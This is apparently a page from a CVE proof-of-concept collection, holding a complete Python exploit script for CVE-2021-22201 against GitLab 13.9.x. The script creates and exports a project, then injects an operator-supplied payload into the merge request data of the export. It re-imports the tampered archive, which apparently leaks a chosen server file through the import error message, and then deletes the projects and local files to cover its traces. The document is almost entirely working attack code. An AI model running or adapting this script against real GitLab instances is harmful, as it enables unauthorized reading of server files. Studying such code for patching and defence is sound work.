4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2021-22201.py PY
import os
import re
import sys
import tarfile
import requests

from json import loads
from uuid import uuid1
from time import sleep
from shutil import rmtree

LOGIN_URI = '/users/sign_in'
CREATE_URI = '/projects/new'
IMPORT_API = '/api/v4/projects/%s/import'
PROJECT_URI = '/%s/'
NEW_PROJECT = '/projects/new'
BRANCH_URI = '/%s/%s/-/branches/new'
PATH = os.path.dirname(__file__)
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}

proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
session = requests.session()
base_url = None
token = None
namespace_id = None
project_name = None
project_id = None
branch_name = None

token_reg = re.compile(r'name="authenticity_token" value="(?P<token>.*?)"')
project_reg = re.compile(r'.*?ID: (\d+)')

def banner():
    print("""
---------- CVE-2021-22201 ----------
---------- 13.9.0 <= Gitlab < 13.9.5
---------- Author: Search?=Null ----

Usage: python3 CVE-2021-22201.py url username password
        """)

def get_token(uri, regex = False):
    """
    获取csrf-token
    """
    global token
    url = base_url + uri
    req = session.get(url, headers = HEADERS)
    req_text = req.text
    try:
        if not regex:
            token = token_reg.search(req_text).group('token')
        else:
            token = re.search(regex, req_text).group(1)
        print(f'[+] Get token: {token}')
    except AttributeError:
        print('[-] Line 60 Failed to obtain token.')
        sys.exit(0)
    except Exception as e:
        print(f'[-] Line 63 Error: {e}')

def login(user, pass_):
    """
    登录
    """
    url = base_url + LOGIN_URI
    get_token(LOGIN_URI)
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'user[login]': user,
        'user[password]': pass_,
        'user[remember_me]': 0
    }
    try:
        req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
        if req.status_code == 302 and 'redirected' in req.text:
            print('[+] Login Success.')
        elif req.status_code == 200 and 'Invalid Login or password' in req.text:
            print('[-] Line 83: Invalid Login or password.')
    except Exception as e:
        print('[-] Line 85 Login failed. ' + str(e))
    create_project()

def create_project():
    """
    创建项目, 项目名采用随机字符
    """
    global PROJECT_URI
    global project_name
    global project_id
    global namespace_id
    url = base_url + CREATE_URI[:9]
    get_token(CREATE_URI)
    project_name = str(uuid1())[:8]
    r = session.get(base_url + CREATE_URI, headers = HEADERS)
    namespace_id = re.search(r'<input value="(\d+)" type="hidden" name="project\[namespace_id\]" id="project_namespace_id"', r.text).group(1)
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'project[ci_cd_only]': 'false',
        'project[name]': project_name,
        'project[namespace_id]': namespace_id,
        'project[path]': project_name,
        'project[description]': project_name,
        'project[visibility_level]': 20,
        'project[initialize_with_readme]': 1
    }
    try:
        req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
        if req.status_code == 302 and 'redirected' in req.text:
            print(f'[+] Create project {project_name} success.')
        get_project_id(project_name)
    except Exception as e:
        print(f'[-] Line 118 ERROR: {e}.')
    create_branch()

def get_project_id(project_name):
    url = base_url + PROJECT_URI % (username) + project_name
    try:
        req_project = session.get(url, headers = HEADERS)
        project_id = project_reg.search(req_project.text).group(1)
        print(f'[+] Project {project_name} ID: {project_id}')
        return project_id
    except Exception as e:
        print(f'[-] Line 129 Error: {e}')

def create_branch():
    """
    创建分支
    """
    global branch_name
    uri = BRANCH_URI % (username, project_name)
    get_token(uri)
    url = (base_url + uri).replace('/new', '')
    branch_name = str(uuid1())[:8]
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'branch_name': branch_name,
        'ref': 'master'
    }
    try:
        req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
        if req.status_code == 302 and 'redirected' in req.text:
            print(f'[+] Create branch {branch_name} success.')
    except Exception as e:
        print(f'[-] Line 151 Error: {e}')
    newfile_uri = f'/{username}/{project_name}/new/{branch_name}/'
    get_token(newfile_uri)
    create_file(f'/{username}/{project_name}/-/create/{branch_name}')


def create_file(uri):
    """
    新分支添加文件
    """
    url = base_url + uri
    filename = str(uuid1())[:8]
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'file_name': filename,
        'commit_message': 'Add+new+file',
        'branch_name': branch_name,
        'original_branch': branch_name,
        'content': str(uuid1())
    }
    try:
        req = session.post(url, headers = HEADERS, data = data, allow_redirects=False)
        if req.status_code == 302 and 'redirected' in req.text:
            print(f'[+] Create file {filename} success.')
    except Exception as e:
        print(f'[-] Line 177 Error: {e}.')
    merge_request()

def merge_request():
    """
    添加PR合并请求
    """
    uri = PROJECT_URI % (username) + project_name + '/-/merge_requests/new'
    # print(uri)
    get_token(uri, r'name="csrf-token" content="(.*?)"')
    params = {
        'utf8': '✓',
        'merge_request[source_project_id]': project_id,
        'merge_request[source_branch]': branch_name,
        'merge_request[target_project_id]': project_id,
        'merge_request[target_branch]': 'master'
    }
    try:
        req = session.get(base_url + uri, headers = HEADERS, params = params)
        diff_head_sha = re.search(r'name="merge_request_diff_head_sha" id="merge_request_diff_head_sha" value="(.*?)"', req.text).group(1)
    except Exception as e:
        print(f'[-] Line 198 Error: {e}')
        sys.exit(0)
    merge_url = base_url + uri.replace('/new', '')
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'merge_request[title]': 'Add new file',
        'merge_request_diff_head_sha': diff_head_sha,
        'merge_request[description]': '',
        'merge_request[assignee_ids][]': 0,
        'merge_request[reviewer_ids][]': 0,
        'merge_request[label_ids][]': '',
        'merge_request[force_remove_source_branch]': 0,
        'merge_request[force_remove_source_branch]': 1,
        'merge_request[squash]': 0,
        'merge_request[lock_version]': 0,
        'merge_request[source_project_id]': project_id,
        'merge_request[source_branch]': branch_name,
        'merge_request[target_project_id]': project_id,
        'merge_request[target_branch]': 'master'
    }
    try:
        merge_req = session.post(merge_url, headers = HEADERS, data = data, allow_redirects = False)
        if merge_req.status_code == 302 and 'redirected' in merge_req.text:
            print('[+] Merge request success.')
    except Exception as e:
        print(f'[-] Line 189 Error: {e}')
        sys.exit(0)
    export_project()

def export_project():
    """
    导出项目
    """
    uri = PROJECT_URI % (username) + project_name + '/edit'
    get_token(uri)
    data = {
        '_method': 'POST',
        'authenticity_token': token
    }
    url = base_url + uri.replace('edit', 'export')
    try:
        req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
        if req.status_code == 302 and 'redirected' in req.text:
            print('[+] Export project success.')
            # 延时两秒后下载导出的压缩包
            sleep(5)
    except Exception as e:
        print(f'[-] Line 246 Error: {e}')
    download_export()

def download_export():
    url = base_url + PROJECT_URI % (username) + project_name + '/download_export'
    filename = f'{username}_{project_name}_export.tar.gz'
    try:
        req = session.get(url, headers = HEADERS)
        with open(os.path.join(PATH, filename), 'wb') as fp:
            fp.write(req.content)
        print(f'[+] Download {filename} success.')
    except Exception as e:
        print(f'[-] Line 258 Error: {e}')
    delete_project(project_name)
    add_payload(os.path.join(PATH, filename))

def delete_project(name):
    uri = PROJECT_URI % (username) + name
    get_token(uri)
    url = base_url + uri
    data = {
        '_method': 'delete',
        'authenticity_token': token
    }
    try:
        req = session.post(url, headers = HEADERS, data = data, allow_redirects = False)
        if req.status_code == 302 and 'redirected' in req.text:
            print(f'[+] Delete project {name} success.')
    except Exception as e:
        print(f'[-] Line 275 Error: {e}')

def add_payload(filepath):
    payload = input('file > ')
    try:
        output_path = os.path.join(PATH, 'export')
        if not os.path.exists(output_path):
            t = tarfile.open(filepath)
            os.mkdir(output_path)
            t.extractall(path = output_path)
            t.close()
            file_path = os.path.join(output_path, 'tree', 'project', 'merge_requests.ndjson')
            with open(file_path, 'r') as f:
                content = re.sub(r'"trailers":.*?}]', '"trailers":"%s"}]' % payload, f.read())
            with open(file_path, 'w+') as fp:
                fp.write(content)
            # with tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz') as tar:
            payload_file = tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz')
            payload_file.add(output_path, arcname = '.')
            payload_file.close()
            print('[+] Add payload success.')
        os.remove(filepath)
    except Exception as e:
        print(f'[-] Line 298 Error: {e}')
    import_project()

def import_project():
    get_token(NEW_PROJECT)
    url = base_url + '/import/gitlab_project'
    name = str(uuid1())[:8]
    data = {
        'utf8': '✓',
        'authenticity_token': token,
        'name': name,
        'namespace_id': namespace_id,
        'path': name,
    }
    f = open(os.path.join(PATH, 'payload.tar.gz'), 'rb')
    project_file = {'file': f}
    try:
        req = session.post(url, headers = HEADERS, data = data, files = project_file)
        if req.status_code == 302 and 'redirected' in req.text:
            print('[+] Uploaded project success.')
    except Exception as e:
        print(f'[-] Line 319 Error: {e}')
    f.close()
    sleep(5)
    id_ = get_project_id(name)
    url = base_url + IMPORT_API % (str(id_))
    try:
        r = session.get(url, headers = HEADERS)
        if r.status_code == 200 and 'JSON::Schema::JsonParseError' in r.text:
            content = loads(r.text)
    except Exception as e:
        print(f'[-] Line 329 Error: {e}')
    delete_project(name)
    print('\n\n' + content['failed_relations'][0]['exception_message'] + '\n\n')
    delete_all()


def delete_all():
    try:
        os.unlink(os.path.join(PATH, 'payload.tar.gz'))
        print('[+] Deleteed file payload.tar.gz success.')
        rmtree(os.path.join(PATH, 'export'), ignore_errors = True)
        print('[+] Deleteed dir export succcess.')
    except Exception as e:
        print(f'[-] Line 342 Error: {e}')

def main():
    banner()
    if len(sys.argv) < 4:
        sys.exit(0)
    else:
        global username
        url = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
    if not url.startswith('http://') or not url.startswith('https://'):
        global base_url
        base_url = 'http://' + url.rstrip('/')
    # print(url)
    login(username, password)


if __name__ == '__main__':
    main()